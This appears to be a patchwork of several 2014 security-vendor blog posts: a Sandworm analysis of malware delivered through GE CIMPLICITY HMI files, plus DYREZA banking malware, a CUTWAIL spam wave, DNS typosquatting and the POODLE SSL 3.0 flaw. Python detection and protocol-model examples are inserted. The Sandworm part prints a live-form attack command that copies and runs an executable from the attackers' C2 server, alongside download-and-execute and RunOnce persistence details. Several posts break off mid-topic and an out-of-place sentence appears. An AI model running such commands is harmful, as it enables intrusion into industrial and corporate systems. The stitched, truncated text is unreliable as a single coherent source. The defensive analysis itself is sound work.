
    On October 14th, a report was publicly released regarding the Sandworm team. After beginning an investigation into the affiliated malware samples and domains, we quickly came to the realization that this group is very likely targeting SCADA-centric victims who are using GE Intelligent Platform’s CIMPLICITY HMI solution suite. We have observed this team utilizing .cim and .bcl files as attack vectors, both file types used by the CIMPLICITY software. As further proof that the malware targets CIMPLICITY, it drops files into the CIMPLICITY installation directory using the %CIMPATH% environment variable on the victim machines.

    Figure 1. Strings showing environment variable

    CIMPLICITY is an application suite that is used in conjunction with SCADA systems.  A key component of any SCADA system is the HMI. The HMI (which stands for Human-Machine interface) can be viewed as an operator console that is used to monitor and control devices in an industrial environment. These devices can be responsible for automation control as well as safety operations.

    Figure 2 below shows an example of where HMIs can be found in an electric power delivery system. Additionally, you may find HMIs in the corporate network that are being used for design, development, and testing.

    Figure 2. Sample SCADA System

    It is important to note that we are currently seeing CIMPLICITY being used as an attack vector; however, we have found no indication that this malware is manipulating any actual SCADA systems or data. Since HMIs are located in both the corporate and control networks, this attack could be used to target either network segment, or used to cross from the corporate to the control network.

    What Drew Our Attention?

    When looking closer at the recent Sandworm Team report, we started to pivot off several of the C2’s that were identified in the report. Again, we aren’t aware of any attacks against SCADA devices directly utilizing anything that we discuss below.

    One of the C2’s that drew our immediate attention was 94[.]185[.]85[.]122. We pivoted off this C2 and located a file called config.bak (SHA1 hash: c931be9cd2c0bd896ebe98c9304fea9e). This file piqued our interest right off the bat, because it is a CimEdit/CimView file. A CimEdit/CimView file is an object-oriented file for GE’s Cimplicity SCADA software suite, used to administer SCADA devices.

    Figure 3. CimView/CimEdit Example

    In config.bak, there are two events that are defined: OnOpenExecCommand and ScreenOpenDispatch.

    The handler of OnOpenExecCommand is the following command line:

    cmd.exe /c "copy \\94[.]185[.]85[.]122\public\default.txt "%CIMPATH%\CimCMSafegs.exe" && start "WOW64" "%CIMPATH%\CimCMSafegs.exe"

    It’s important to note the variable %CIMPATH% is used for the drop location of default.txt. This is a standard variable that Cimplicity uses for its installs. The handler of ScreenOpenDispatch is the subroutine start(). The subroutine start() downloads the file from hxxp://94[.]185[.]85[.]122/newsfeed.xml, saves and executes the downloaded file using cscript.exe, deletes the file after execution, and terminates the current process.

    We currently do not have a sample of newsfeed.xml or {random 41 character hex string}.wsf that can be analyzed for further detail. This event mechanism does not seem to exploit vulnerabilities; it’s comparable to AutoOpen and AutoExec in Microsoft Office.

    In addition to config.bak being a CimEdit/CimView file, there is a reference to devlist.cim (MD5: 59e41a4cdf2a7d37ac343d0293c616b7), which is a Cimpack Design Drawing File.

    The default.txt file copied from the C2 in the above command structure drops and executes %Startup%\flashplayerapp.exe, then deletes itself after execution. Flashplayerapp.exe is capable of issuing the following commands:

    • exec
    • lexec
    • die
    • getup
    • turnoff
    • chprt

    In addition to config.bak and default.txt being of interest, another file, shell.bcl (MD5: bdc7fafc26bee0e5e75b521a89b2746d), drew our attention. It is a script designed to run in the Basic Control Engine; .bcl files are used heavily throughout SCADA systems, and in Cimplicity specifically, to script and automate functions. Shell.bcl executes 94[.]185[.]85[.]122\public\xv.exe directly.

    Based on the strings in shell.bcl, xv.exe appears intended to exploit a system vulnerability. We don’t currently have a copy or hash of xv.exe or Flashplayerapp.exe available to confirm this assumption.
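    As an added triage example (not code from the original post or from Trend Micro), the following Python script applies the indicators described above to the printable strings of a CimEdit-style file: the two event names, a cmd.exe copy from a UNC path, a drop into %CIMPATH%, and cscript execution. It is a strings-level heuristic over a constructed sample that uses a documentation-range IP, not a parser of the CimEdit format.

```python
import re

# Indicators drawn from the handler behaviour described above.
EVENT_NAMES = ("OnOpenExecCommand", "ScreenOpenDispatch")
SUSPICIOUS = {
    "shell_launch": re.compile(r"cmd\.exe\s+/c", re.I),
    "unc_copy": re.compile(r"copy\s+\\\\\d{1,3}(?:\.\d{1,3}){3}\\", re.I),
    "cimpath_drop": re.compile(r'%CIMPATH%\\[^\s"]+\.exe', re.I),
    "script_host": re.compile(r"cscript\.exe", re.I),
    "remote_url": re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}/", re.I),
}

def printable_strings(data: bytes, min_len: int = 6) -> list:
    """Extract ASCII runs from a binary blob, like the strings tool does."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, data)]

def scan_cim_blob(data: bytes) -> dict:
    """Report which event names and which indicator classes appear."""
    joined = "\n".join(printable_strings(data))
    return {
        "events": [e for e in EVENT_NAMES if e in joined],
        "indicators": sorted(k for k, rx in SUSPICIOUS.items() if rx.search(joined)),
    }

def is_suspicious(report: dict) -> bool:
    """An open-event handler that launches a shell, copies from a remote
    host, or drops an executable into %CIMPATH% warrants a closer look."""
    launch_like = {"shell_launch", "unc_copy", "cimpath_drop"}
    return bool(report["events"]) and bool(set(report["indicators"]) & launch_like)

# Constructed sample (hypothetical, not the real config.bak): binary filler
# around strings modelled on the handler quoted above, with a 192.0.2.x host.
SAMPLE = (b"\x00\x01CIMEDIT\x00\x00OnOpenExecCommand\x00"
          b'cmd.exe /c "copy \\\\192.0.2.10\\public\\default.txt "%CIMPATH%\\CimCMSafegs.exe""\x00'
          b"ScreenOpenDispatch\x00start\x00http://192.0.2.10/newsfeed.xml\x00cscript.exe\x00")
# A benign-looking open handler for comparison (also constructed).
BENIGN = b"\x00\x01CIMEDIT\x00\x00OnOpenExecCommand\x00notepad.exe readme.txt\x00"

if __name__ == "__main__":
    for name, blob in (("sample", SAMPLE), ("benign", BENIGN)):
        report = scan_cim_blob(blob)
        print(name, report, "suspicious" if is_suspicious(report) else "clean")
```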

    Open Directories

    During the course of regular threat intelligence gathering, we often look closely at the C2 server that attackers are using to communicate and drop/upload files to and from victim machines.

    In the case of 94[.]185[.]85[.]122, in addition to config.bak, we were able to pull down additional malware files that the particular actors were using from the C2. A few of the notable files found on the C2 can be found below. These files may or may not have been used in conjunction with attacks involving SCADA devices.

    Spiskideputatovdone.ppsx (MD5: 330e8d23ab82e8a0ca6d166755408eb1), whose name means “deputy list” in Russian, has been tied to an email address based on VirusTotal submissions. This PPSX file downloads and loads 94[.]185[.]85[.]122\public\slide1.gif and 94[.]185[.]85[.]122\public\slides.inf (MD5: 8313034e9ab391df83f6a4f242ec5f8d). The downloaded slides.inf renames the local file slide1.gif to slide1.gif.exe and adds the registry entry HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce Install=”{dir}\slide1.gif.exe”. Oleh Tiahnybok is a Ukrainian politician with outspoken anti-Russian views.

    Slide1.gif.exe (MD5: 8a7c30a7a105bd62ee71214d268865e3) drops FONTCACHE.DAT (MD5: 2f6582797bbc34e4df47ac25e363571d) and deletes itself after execution. FONTCACHE.DAT is a version of the Black Energy bot capable of executing the following commands on the system:

    • delete
    • ldplg
    • unlplg
    • update
    • dexec
    • exec
    • updcfg


    As we have seen, these are pieces of a very complex targeted attack that is seemingly focused on GE Intelligent Platform CIMPLICITY users.  We have, at present, found no indications that this malware is actually manipulating physical SCADA systems or their resultant data.

    As we continue the investigation into this targeted attack, be sure to check back as we will keep you up to date on our findings. All of the samples listed in this blog are currently caught by Trend Micro under the names BKDR_BLACKEN.A and BKDR_BLACKEN.B.

    Special thanks to the entire Forward-Looking Threat Research Team, Christopher Daniel So, Mark Joseph Manahan and the Ottawa Deep Security Labs.

    Update as of October 17, 2014, 12:35 A.M.

    An earlier version of this post included several incorrect hashes. These have now been corrected.


    Cybercriminals and threat actors often use tried-and-tested vulnerabilities in order to infect user systems and, consequently, penetrate an enterprise network. This highlights the importance of patching systems and keeping software and applications up to date.

    We recently spotted DYREZA malware leveraging an old vulnerability in Adobe Reader and Acrobat, covered under CVE-2013-2729. Once this vulnerability is successfully exploited, it can lead to the execution of arbitrary code on the affected system.



    Figures 1-2. Screenshots of spam emails

    DYREZA malware uses a spammed message that purports to be an invoice notification as its infection vector. It carries a malicious .PDF file attachment, detected by Trend Micro as TROJ_PIDIEF.YYJU. When executed, it exploits the CVE-2013-2729 vulnerability, which leads to the download of TSPY_DYRE.EKW, a variant of DYREZA (also known as DYRE and DYRANGES).

    DYREZA is malware known for stealing banking credentials and is associated with parcel mule scams. We recently wrote a blog post detailing the role that this malware plays in the threat landscape ecosystem and some of its notable behavior, including its capability to perform man-in-the-middle (MITM) attacks via browser injections, to monitor online banking sessions of targeted banks, and to steal other information such as browser versions, snapshots, and personal certificates.

    Users and enterprises are at risk since DYREZA can obtain other types of data, such as personally identifiable information (PII) and credentials, via browser snapshots. Aside from this, we also reported that the CUTWAIL botnet leads to the download of both UPATRE and DYRE malware.

    What makes TSPY_DYRE.EKW notable is its ability to steal crucial information by injecting malicious code into certain banking and bitcoin login webpages. Some of the bitcoin pages it monitors are:


    Apart from its information-stealing routines, TSPY_DYRE.EKW has the capability to connect to certain malicious websites to send and receive information. Moreover, it can connect to specific STUN (Session Traversal Utilities for NAT) servers to determine the public IP address of the compromised computer. As such, cybercriminals can find out the location of the malware or possibly determine the affected users’ and organizations’ locations. The most affected countries are Ireland, the United States, Canada, Great Britain, and the Netherlands.

    Bitcoin is a digital currency with real-world value. Cybercriminals often go after bitcoins since they present a new venue for generating profit. While this is not the first instance of scammers and cybercriminals targeting bitcoins, this new attack highlights how traditional threats like exploits and banking malware remain a relevant means for cybercriminals both to steal user credentials and to hit a relatively new platform such as bitcoin. It also teaches an important lesson about keeping systems and software applications updated to their latest versions.

    Trend Micro protects users from this threat via its Smart Protection Network that detects the spammed message and all related malware.

    With additional analysis from Rhena Inocencio, Karla Agregada, and Michael Casayuran


    A new spam attack disguised as invoice message notifications was recently seen spreading the UPATRE malware, which ultimately downloads its final payload: a BANKER malware related to the DYREZA/DYRE banking malware.


    In early October we observed a surge of spammed messages sent by the botnet CUTWAIL/PUSHDO, totaling more than 18,000 messages seen in a single day. CUTWAIL/PUSHDO has been in the wild since as early as 2007 and was considered one of the biggest spam botnets in 2009.

    We spotted spammed emails that disguise themselves as invoice message notifications or “new alert messages” from various companies and institutions.

    Figure 1. Screenshots of spammed messages related to CUTWAIL/PUSHDO



    The Domain Name System (DNS) plays a vital role in the operation of the Internet. Over the years, it has been a primary target for malicious users looking for vulnerabilities in its protocol and infrastructure. Some examples include cache poisoning attacks, vulnerable DNS server implementations, and bogus user interactions.

    Taking advantage of users’ spelling mistakes

    Misspelled domain names in the browser’s address bar are a common user mistake, one that attackers were quick to take advantage of. Attackers register “squatting” or misspelled versions of victim domains in order to capitalize on the potential incoming traffic. They then use these domains in a wide range of unethical and illegal ways, which may include the exfiltration of user credentials through phishing.


    Earlier today, Google researchers Bodo Möller, Thai Duong, and Krzysztof Kotowicz released a paper discussing a serious bug in SSL 3.0 that allows attackers to conduct man-in-the-middle attacks and decrypt the traffic between Web servers and end users.

    For example, if you’re shopping online with your credit card, you may think that your information is secure, but thanks to this bug (known as POODLE) it may actually be at risk. An attacker can hijack your transaction, retrieve your credit card information, or even change your order.

    The bullet points below summarize some key points of this vulnerability:

    • CVE ID: CVE-2014-3566
    • Popular name: POODLE (Padding Oracle On Downgraded Legacy Encryption)
    • Vulnerability: SSL 3.0 fallback bug
    • Attack vector: Man-in-the-middle

    How does the POODLE attack work?

    According to the paper, the key issue is the integrity of the padding used with SSL 3.0 block ciphers: this padding is not verified by the protocol. An attacker who can hijack the connection from an end user to the Web server can therefore alter the final block of an SSL record without the change being detected, and this can lead to the attacker successfully decrypting encrypted traffic that they are able to capture.
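    To make the padding point concrete, here is an added example (not code from the paper or the original post) that writes the SSL 3.0 and TLS 1.0+ padding rules for CBC records as plain checks and runs both over a constructed 16-byte record whose padding is altered in transit. The block size and record contents are assumptions for illustration.

```python
def ssl3_padding_ok(plaintext: bytes, block_size: int) -> bool:
    """SSL 3.0 only checks the final byte (the pad length) and requires it
    to be shorter than one block; the pad bytes themselves are never
    examined, which is the weakness the POODLE paper builds on."""
    if not plaintext:
        return False
    pad_len = plaintext[-1]
    return pad_len < block_size and len(plaintext) >= pad_len + 1

def tls_padding_ok(plaintext: bytes) -> bool:
    """TLS 1.0 and later require every padding byte to equal the pad-length
    byte, so a record whose padding was altered in transit is rejected."""
    if not plaintext:
        return False
    pad_len = plaintext[-1]
    if len(plaintext) < pad_len + 1:
        return False
    return all(b == pad_len for b in plaintext[-(pad_len + 1):])

def corrupt_one_pad_byte(record: bytes) -> bytes:
    """Flip one padding byte while leaving the pad-length byte intact
    (models a record whose final block was changed on the wire)."""
    return record[:-3] + bytes([record[-3] ^ 0xFF]) + record[-2:]

BLOCK = 16
# Constructed record: 5 bytes of data, 10 pad bytes, then the length byte
# 10, which pads the plaintext to exactly one 16-byte block.
RECORD = b"hello" + bytes([10] * 10) + bytes([10])

def compare(record: bytes = RECORD) -> dict:
    """Report which rule still accepts the record once its padding changes."""
    tampered = corrupt_one_pad_byte(record)
    return {
        "ssl3_accepts_original": ssl3_padding_ok(record, BLOCK),
        "tls_accepts_original": tls_padding_ok(record),
        "ssl3_accepts_tampered": ssl3_padding_ok(tampered, BLOCK),
        "tls_accepts_tampered": tls_padding_ok(tampered),
    }

if __name__ == "__main__":
    for check, result in compare().items():
        print(f"{check}: {result}")
```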

    SSL 3.0 is an older encryption protocol that has been around for 15 years. It has been succeeded by TLS (which is now at version 1.2). However, TLS clients and servers will downgrade to earlier versions of the protocol if one side of the transaction does not support the latest version.

    Consider the example below. The browser supports versions of TLS up to 1.2. In the first handshake, the browser uses the highest protocol version (TLS 1.2) that it supports. If that handshake fails, the browser will retry with earlier versions (TLS 1.1, then TLS 1.0). The attacker arranges for these handshakes to fail so that the browser downgrades all the way to SSL 3.0, at which point the POODLE vulnerability can be exploited to decrypt communications between the two parties.


    Figure 1:  Attackers may force the communication between a client and server to downgrade from TLS to SSL 3.0 to be able to decrypt the network communication


    This vulnerability can be avoided if the SSL 3.0 protocol is disabled. Site administrators can disable support for this on their side; for example these instructions show how to do this in Apache.

    End users can disable SSL 3.0 support on their end as well, through the following steps:

    • For Chrome users, running Chrome with the command line Chrome.exe --ssl-version-min=tls1 will specify that the minimum protocol version that will be used is TLS 1.0.
    • In Firefox, type about:config in the search bar to change settings. Search for the keyword security.tls.version.min and set the value to 1 to disable SSL 3.0 support.
    • Internet Explorer users can follow the steps in Security Advisory 3009008 to disable SSL 3.0.

    Enterprises can patch their servers via the following steps:

    Note, however, that disabling SSL 3.0 is not a practical step for all users, especially since it can still be needed to work with legacy systems. The security advisory recommended the use of the TLS_FALLBACK_SCSV mechanism on web servers, to ensure that SSL 3.0 is used only when necessary (when a legacy implementation is involved). This way, attackers can no longer force a protocol downgrade.
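    The downgrade sequence from the figure above and the TLS_FALLBACK_SCSV mitigation, modelled together as an added example (not code from the original post or from any TLS library): a browser that retries downward, a server that may or may not honour the SCSV, and a network path that drops handshakes above a chosen version. Version numbers and the cipher suite values are the real wire values; the classes and their behaviour are a simplification assumed for illustration.

```python
# Protocol versions as (major, minor) pairs, as they appear on the wire.
TLS12, TLS11, TLS10, SSL30 = (3, 3), (3, 2), (3, 1), (3, 0)
FALLBACK_SCSV = 0x5600   # TLS_FALLBACK_SCSV signalling cipher suite value
AES128_SHA = 0x002F      # an ordinary cipher suite, used as filler here

class Server:
    def __init__(self, max_version=TLS12, min_version=SSL30, honours_scsv=True):
        self.max_version = max_version
        self.min_version = min_version
        self.honours_scsv = honours_scsv

    def handshake(self, client_version, cipher_suites):
        """Return ("ok", negotiated_version) or ("alert", reason)."""
        # A server that honours the SCSV refuses a fallback ClientHello
        # offering less than the highest version the server supports.
        if (self.honours_scsv and FALLBACK_SCSV in cipher_suites
                and client_version < self.max_version):
            return ("alert", "inappropriate_fallback")
        if client_version < self.min_version:
            return ("alert", "protocol_version")
        return ("ok", min(client_version, self.max_version))

class Path:
    """Network path model: every handshake offering a version above
    `block_above` is dropped; None models an honest, reliable path."""
    def __init__(self, block_above=None):
        self.block_above = block_above

    def deliver(self, server, version, cipher_suites):
        if self.block_above is not None and version > self.block_above:
            return ("alert", "connection_dropped")   # what the browser sees
        return server.handshake(version, cipher_suites)

def connect(server, path, send_scsv):
    """Browser behaviour: try TLS 1.2, then retry downward on failure.
    Returns the negotiated version, or None if no handshake succeeded."""
    for attempt, version in enumerate((TLS12, TLS11, TLS10, SSL30)):
        suites = [AES128_SHA]
        if send_scsv and attempt > 0:      # only retries carry the SCSV
            suites.append(FALLBACK_SCSV)
        status, detail = path.deliver(server, version, suites)
        if status == "ok":
            return detail
    return None

if __name__ == "__main__":
    print("honest path:", connect(Server(), Path(), send_scsv=True))
    print("dropped above SSL3, no SCSV:", connect(Server(), Path(SSL30), False))
    print("dropped above SSL3, SCSV:", connect(Server(), Path(SSL30), True))
```

    With the SCSV, a forced fall-back to SSL 3.0 ends in no connection rather than a downgraded one, while a server that genuinely supports only SSL 3.0 still negotiates it on the first attempt.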

    We will continue to proactively monitor for threats that use this vulnerability and provide updates and solutions as necessary.

    Update as of 1:48 PM, October 15, 2014

    Trend Micro Deep Security customers are protected from attacks that may leverage the POODLE vulnerability via the following DPI rules:

    • 1006293 – Detected SSLv3 Request
    • 1006296 – Detected SSLv3 Response

